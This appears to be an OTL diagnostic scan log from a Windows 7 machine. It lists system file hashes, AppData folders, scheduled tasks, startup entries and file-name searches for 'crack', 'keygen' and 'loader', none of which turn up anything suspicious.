[2009.07.14 02:14:12 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=41E4C8EBA464E7D6A5BA5E8827732AEB -- C:\Windows\winsxs\x86_microsoft-windows-autochk_31bf3856ad364e35_6.1.7600.16385_none_e1ca436d2314b860\autochk.exe
[2009.07.14 02:38:56 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=8B7F8E882A649D81CEA1EDE9BBB68FFF -- C:\Windows\SysNative\autochk.exe
[2009.07.14 02:38:56 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=8B7F8E882A649D81CEA1EDE9BBB68FFF -- C:\Windows\winsxs\amd64_microsoft-windows-autochk_31bf3856ad364e35_6.1.7600.16385_none_3de8def0db722996\autochk.exe

< MD5 for: CDROM.SYS >
[2009.07.14 00:19:54 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=83D2D75E1EFB81B3450C18131443F7DB -- C:\Windows\SysNative\drivers\cdrom.sys
[2009.07.14 00:19:54 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=83D2D75E1EFB81B3450C18131443F7DB -- C:\Windows\SysNative\DriverStore\FileRepository\cdrom.inf_amd64_neutral_8363d00ecae4322d\cdrom.sys
[2009.07.14 00:19:54 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=83D2D75E1EFB81B3450C18131443F7DB -- C:\Windows\winsxs\amd64_cdrom.inf_31bf3856ad364e35_6.1.7600.16385_none_bb9e4d89bd7870f1\cdrom.sys

< MD5 for: EXPLORER.EXE >
[2009.07.14 02:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\SysWOW64\explorer.exe
[2009.07.14 02:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_b7fe430bc7ce3761\explorer.exe
[2009.10.31 06:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_b819b343c7ba6202\explorer.exe
[2009.10.31 07:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_adc508f19359a007\explorer.exe
[2009.10.31 07:38:38 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=B8EC4BD49CE8F6FC457721BFC210B67F -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_ae46d6aeac7ca7c7\explorer.exe
[2009.07.14 02:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\explorer.exe
[2009.07.14 02:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_ada998b9936d7566\explorer.exe
[2009.10.31 07:00:51 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=C76153C7ECA00FA852BB0C193378F917 -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_b89b8100e0dd69c2\explorer.exe

< MD5 for: HAL.DLL >
[2009.07.14 02:47:48 | 000,263,232 | ---- | M] (Microsoft Corporation) MD5=C0A6F6E05E14FBCAEDE7796C8590B7AC -- C:\Windows\SysNative\hal.dll
[2009.07.14 02:47:48 | 000,263,232 | ---- | M] (Microsoft Corporation) MD5=C0A6F6E05E14FBCAEDE7796C8590B7AC -- C:\Windows\winsxs\amd64_microsoft-windows-hal_31bf3856ad364e35_6.1.7600.16385_none_071de44b735b3dfc\hal.dll

< MD5 for: SCECLI.DLL >
[2009.07.14 02:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\SysWOW64\scecli.dll
[2009.07.14 02:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\winsxs\wow64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_9e577e55272d37b4\scecli.dll
[2009.07.14 02:41:53 | 000,232,448 | ---- | M] (Microsoft Corporation) MD5=398712DDDAEFB85EDF61DF6A07B65C79 -- C:\Windows\SysNative\scecli.dll
[2009.07.14 02:41:53 | 000,232,448 | ---- | M] (Microsoft Corporation) MD5=398712DDDAEFB85EDF61DF6A07B65C79 -- C:\Windows\winsxs\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_9402d402f2cc75b9\scecli.dll

< MD5 for: SERVICES.EXE >
[2009.07.14 02:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009.07.14 02:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe

< MD5 for: SVCHOST.EXE >
[2009.07.14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\SysWOW64\svchost.exe
[2009.07.14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe
[2014.11.21 06:12:42 | 000,761,656 | ---- | M] (MalwareBytes) MD5=625BB08813743947985B0DEEFC35ED12 -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2009.07.14 02:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\SysNative\svchost.exe
[2009.07.14 02:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_11b04b481efec48c\svchost.exe

< MD5 for: TCPIP.SYS >
[2010.04.09 12:06:28 | 001,898,376 | ---- | M] (Microsoft Corporation) MD5=7FC877A25796D8ADF539E64703FCA7E1 -- C:\Windows\SysNative\drivers\tcpip.sys
[2010.04.09 12:06:28 | 001,898,376 | ---- | M] (Microsoft Corporation) MD5=7FC877A25796D8ADF539E64703FCA7E1 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7600.16569_none_0f2ca8c580036f65\tcpip.sys
[2009.07.14 02:45:55 | 001,898,576 | ---- | M] (Microsoft Corporation) MD5=912107716BAB424C7870E8E6AF5E07E1 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7600.16385_none_0f1303f98017479d\tcpip.sys
[2010.04.09 08:56:29 | 001,892,232 | ---- | M] (Microsoft Corporation) MD5=A9C0F786AC1F736891D05CE0A1D29DEB -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7600.20687_none_0f9ea52499331463\tcpip.sys

< MD5 for: USERINIT.EXE >
[2009.07.14 02:14:43 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=6DE80F60D7DE9CE6B8C2DDFDF79EF175 -- C:\Windows\SysWOW64\userinit.exe
[2009.07.14 02:14:43 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=6DE80F60D7DE9CE6B8C2DDFDF79EF175 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7600.16385_none_dbff103933038d7c\userinit.exe
[2009.07.14 02:39:48 | 000,030,208 | ---- | M] (Microsoft Corporation) MD5=6F8F1376A13114CC10C0E69274F5A4DE -- C:\Windows\SysNative\userinit.exe
[2009.07.14 02:39:48 | 000,030,208 | ---- | M] (Microsoft Corporation) MD5=6F8F1376A13114CC10C0E69274F5A4DE -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7600.16385_none_381dabbceb60feb2\userinit.exe

< MD5 for: WINLOGON.EXE >
[2009.07.14 02:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\SysNative\winlogon.exe
[2009.07.14 02:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe
[2014.11.21 06:12:42 | 000,761,656 | ---- | M] (MalwareBytes) MD5=625BB08813743947985B0DEEFC35ED12 -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\winlogon.exe
[2009.10.28 08:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe
[2009.10.28 07:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe

< >

< %systemroot%*.* /U /s >
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\*.tmp files -> C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\*.tmp -> ]
[2 C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\*.tmp files -> C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\*.tmp -> ]
[1 C:\Windows\Installer\*.tmp files -> C:\Windows\Installer\*.tmp -> ]
[52 C:\Windows\Temp\*.tmp files -> C:\Windows\Temp\*.tmp -> ]

< %SYSTEMDRIVE%\*.exe >

< %ALLUSERSPROFILE%\Application Data\*. >

< %ALLUSERSPROFILE%\Application Data\*.exe /s >

< %APPDATA%\*. >
[2013.04.26 18:27:28 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Adobe
[2013.11.04 10:40:41 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Apple Computer
[2014.10.22 17:33:04 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Audacity
[2014.04.02 10:28:32 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\AVG
[2014.10.16 09:31:26 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\AVS4YOU
[2014.01.17 13:39:39 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Battle.net
[2013.04.27 18:06:13 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer
[2013.04.19 15:00:12 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer Pro
[2014.12.06 10:37:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
[2013.04.26 10:04:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DAEMON Tools Lite
[2014.04.02 10:27:50 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DVDVideoSoft
[2014.11.10 22:52:18 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\e-academy Inc
[2013.04.23 15:44:47 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\ESET
[2014.01.13 19:38:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GetRight
[2014.10.06 10:22:09 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GHISLER
[2014.09.23 09:18:11 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\gtk-2.0
[2013.04.20 15:18:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\HpUpdate
[2013.04.19 14:14:12 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Identities
[2014.11.03 20:02:03 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\IK Multimedia
[2013.04.19 14:58:08 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Macromedia
[2013.05.02 09:57:07 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\MathWorks
[2013.04.19 20:59:10 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Media Player Classic
[2014.11.20 09:50:49 | 000,000,000 | --SD | M] -- C:\Users\Lobo\AppData\Roaming\Microsoft
[2013.04.19 14:50:49 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Mozilla
[2014.06.22 11:08:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\NVIDIA
[2014.05.15 17:04:37 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\PDF Architect
[2014.05.15 17:02:19 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\pdfforge
[2014.02.21 11:50:35 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\PSpad
[2014.06.22 11:08:40 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Publish Providers
[2013.04.19 15:05:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\QIP
[2014.11.03 20:23:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\REAPER
[2013.07.05 22:29:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Riot Games
[2013.05.25 22:13:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Shifters Anticheat
[2014.09.29 20:01:07 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Skype
[2013.06.17 20:23:56 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Softland
[2014.07.01 10:52:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sony
[2014.06.24 16:05:17 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sublime Text 3
[2014.11.26 22:35:10 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\TS3Client
[2014.01.13 19:34:53 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Unity
[2013.06.28 11:03:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\VitySoft
[2013.04.26 14:26:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\WinRAR

< %APPDATA%\*.exe /s >
[2014.03.06 16:01:54 | 000,207,368 | ---- | M] (Check Point Software Technologies LTD) -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD\zonealarm\1.8.29.17\uninstall.exe
[2014.12.08 23:26:22 | 000,200,824 | ---- | M] (Check Point Software Technologies LTD) -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD\zonealarm\1.8.29.17\uninstall_d.exe
[2014.03.06 13:18:22 | 000,729,384 | ---- | M] (Check Point Software Technologies LTD) -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD\zonealarm\1.8.29.17\zonealarm4ffx.exe
[2014.11.10 22:52:18 | 000,009,662 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E040B65B-8683-4228-8C33-D44A141E40EA}\_112D608FD02CD87FDC7735.exe
[2014.11.10 22:52:18 | 000,009,662 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E040B65B-8683-4228-8C33-D44A141E40EA}\_80D807FC3A72E5B428F1ED.exe
[2014.11.10 22:52:18 | 000,009,662 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E040B65B-8683-4228-8C33-D44A141E40EA}\_853F67D554F05449430E7E.exe
[2014.07.01 08:58:05 | 000,010,134 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\ARPPRODUCTICON.exe
[2014.07.01 08:58:05 | 000,003,262 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hl.exe1_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2014.07.01 08:58:05 | 000,003,262 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hl.exe_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2014.07.01 08:58:05 | 000,040,960 | R--- | M] (InstallShield Software Corp.) -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hlds.exe_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2014.07.01 08:58:05 | 000,040,960 | R--- | M] (InstallShield Software Corp.) -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hltv.exe_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2013.05.03 18:01:50 | 000,031,232 | ---- | M] () -- C:\Users\Lobo\AppData\Roaming\QIP\Profiles\196726440@qip.ru\RcvdFiles\Honza_18__204630063\1\1\jedna\Debug\jedna.exe

< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job >
[2014.12.09 17:14:02 | 000,000,914 | ---- | M] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014.12.09 13:42:07 | 000,000,948 | ---- | M] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job
[2014.12.09 17:48:00 | 000,000,952 | ---- | M] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< %systemroot%\System32\config\*.sav >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\system32\drivers\*.sys /3 >

< %systemroot%\system32\*.* /3 >
[2014.12.07 21:13:55 | 001,765,988 | ---- | M] () -- C:\Windows\system32\PerfStringBackup.INI

< %SYSTEMDRIVE%\*.exe >

< >

< HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s >
"Sidebar" = C:\Program Files\Windows Sidebar\sidebar.exe /autoRun -- [2009.07.14 02:39:41 | 001,475,072 | ---- | M] (Microsoft Corporation)
"DAEMON Tools Lite" = "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun -- [2013.03.14 09:23:30 | 003,672,640 | ---- | M] (Disc Soft Ltd)
"GoogleDriveSync" = "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart -- [2014.08.08 09:34:04 | 022,734,160 | ---- | M] (Google)

< >

< %PROGRAMFILES%\Mozilla Firefox\firefox.exe /md5 >
[2014.11.11 00:49:31 | 000,275,568 | ---- | M] (Mozilla Corporation) MD5=65068E245EFE045E6956190CD0E2FB91 -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe

< %PROGRAMFILES%\Internet Explorer\iexplore.exe /md5 >
[2009.07.14 02:17:29 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=2C32E3E596CFE660353753EABEFB0540 -- C:\Program Files (x86)\Internet Explorer\iexplore.exe

< %PROGRAMFILES%\Opera\opera.exe /md5 >

< %PROGRAMFILES%\Google\Chrome\Application\chrome.exe /md5 >
[2014.08.07 04:20:57 | 000,860,488 | ---- | M] (Google Inc.) MD5=0BDAE865738D27A4D84D50591C8C9D2D -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

< >

< %SystemDrive%\PhysicalMBR.bin /md5 >
[2014.12.09 17:36:27 | 000,000,512 | ---- | M] () MD5=528F8822153B058CF471ABD9A7E1C8AF -- C:\PhysicalMBR.bin

< >

< *crack* /s >
[2010.10.04 21:50:56 | 000,062,238 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\share\gimp\2.0\patterns\cracked.pat
[2010.10.08 11:10:04 | 000,000,254 | ---- | M] () -- \Program Files\MATLAB\R2011b\resources\pde\en\crackg.xml
[2001.02.09 12:03:10 | 000,000,483 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\crackb.m
[2010.10.08 12:14:22 | 000,002,865 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\crackg.m
[2005.03.07 12:35:58 | 000,000,091 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\ja\crackb.m
[2005.03.07 12:35:58 | 000,000,582 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\ja\crackg.m
[2013.06.28 11:03:22 | 000,005,369 | ---- | M] () -- \Users\Lobo\AppData\Roaming\VitySoft\FRD\plugins\crackle.frp

< *keygen* /s >
[2011.07.26 18:39:12 | 000,000,719 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\compiler\mcr\matlab\hmi\hmi\+hmi\+utils\UniqueGuiKeyGenerator.m

< *loader* /s >
[2008.02.25 07:05:22 | 000,856,064 | ---- | M] () -- \KMPlayer\ImLoader.dll
[2013.04.21 21:44:16 | 000,008,827 | ---- | M] () -- \Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit.resources\inspector\HeapSnapshotLoader.js
[2013.05.30 12:48:02 | 004,372,840 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\MobileUploader\AVSMobileUploader.exe
[2013.05.30 12:44:14 | 000,095,971 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\MobileUploader\AVSMobileUploader.sil
[2013.07.09 17:08:34 | 004,496,744 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\VideoUploader\AVSVideoUploader.exe
[2013.05.29 16:34:00 | 000,046,165 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\VideoUploader\AVSVideoUploader.sil
[2013.04.30 12:10:02 | 000,000,194 | ---- | M] () -- \Program Files (x86)\Common Files\Blizzard Entertainment\BlizzardDownloader.ini
[2012.07.26 19:08:06 | 000,102,864 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VS7Debug\coloader80.dll
[2012.07.26 13:20:02 | 000,004,096 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VS7Debug\coloader80.tlb
[2007.10.12 07:19:58 | 000,052,232 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\8.0\AddinLoader.dll
[2007.10.12 07:20:18 | 000,129,024 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\8.0\VSTOLoader.dll
[2007.10.12 07:20:14 | 000,017,416 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\8.0\1033\VSTOLoaderUI.dll
[2007.11.07 10:40:30 | 000,205,312 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\9.0\VSTOLoader.dll
[2007.11.07 10:40:30 | 000,018,952 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\9.0\1033\VSTOLoaderUI.dll
[2014.05.27 15:15:42 | 000,597,278 | ---- | M] () -- \Program Files (x86)\Comodo\Dragon\extensions\media_downloader.crx
[2010.02.07 21:40:00 | 000,000,543 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\etc\gtk-2.0\gdk-pixbuf.loaders
[2009.12.15 17:58:18 | 000,017,056 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-ani.dll
[2009.12.15 17:58:20 | 000,018,592 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-bmp.dll
[2009.12.15 17:58:24 | 000,026,272 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-gif.dll
[2009.12.15 17:58:26 | 000,012,960 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-icns.dll
[2009.12.15 17:58:28 | 000,017,568 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-ico.dll
[2009.12.15 17:58:56 | 000,019,616 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-jpeg.dll
[2009.12.15 17:59:04 | 000,015,008 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-pcx.dll
[2009.12.15 17:59:06 | 000,019,104 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-png.dll
[2009.12.15 17:59:10 | 000,017,056 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-pnm.dll
[2009.12.15 17:59:14 | 000,012,448 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-ras.dll
[2009.12.15 17:59:16 | 000,016,544 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-tga.dll
[2009.12.15 17:59:20 | 000,016,544 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-tiff.dll
[2009.12.15 17:59:22 | 000,011,936 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-wbmp.dll
[2009.12.15 17:59:24 | 000,013,984 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-xbm.dll
[2009.12.15 17:59:28 | 000,028,320 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-xpm.dll
[2009.05.01 19:42:00 | 000,009,880 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\svg_loader.dll
[2009.10.06 04:08:30 | 000,145,082 | ---- | M] () -- \Program Files (x86)\HP\HP Deskjet 2050 J510 series\bin\HelpViewer\Resources\Loader.gif
[2014.06.11 10:08:18 | 000,412,736 | ---- | M] () -- \Program Files (x86)\CheckPoint\ZoneAlarm\avsys\kas_loader.dll
[2014.06.11 10:08:34 | 000,368,704 | ---- | M] () -- \Program Files (x86)\CheckPoint\ZoneAlarm\avsys\prloader.dll
[2005.10.14 01:49:48 | 000,017,624 | ---- | M] () -- \Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SqlResourceLoader.dll
[2005.10.14 01:49:48 | 000,017,624 | ---- | M] () -- \Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\SqlResourceLoader.dll
[2012.11.01 08:32:14 | 000,057,224 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXLoader.dll
[2012.11.01 08:32:44 | 000,065,416 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXLoader64.dll
[2012.09.04 22:34:12 | 000,083,848 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXUpdateLoader.dll
[2012.09.04 22:34:12 | 000,088,968 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXUpdateLoader64.dll
[2011.07.08 15:53:48 | 000,000,816 | ---- | M] () -- \Program Files\MATLAB\R2011b\bin\registry\dotnetcli_loader.xml
[2011.08.13 23:39:38 | 000,008,704 | ---- | M] () -- \Program Files\MATLAB\R2011b\bin\win64\dotnetcli_loader.dll
[2011.07.11 21:17:24 | 000,015,012 | ---- | M] () -- \Program Files\MATLAB\R2011b\help\toolbox\javabuilder\MWArrayAPI\com\mathworks\toolbox\javabuilder\MWCtfClassLoaderSource.html
[2009.09.21 06:46:08 | 000,015,003 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\AutoLoader.pm
[2005.09.12 13:21:36 | 000,000,727 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\ByteLoader.pm
[2010.01.26 22:16:30 | 000,027,274 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\DynaLoader.pm
[2008.10.25 14:58:38 | 000,017,776 | ---- | M] () -- \Program Files\MATLAB\R2011b\sys\perl\win32\lib\SelfLoader.pm
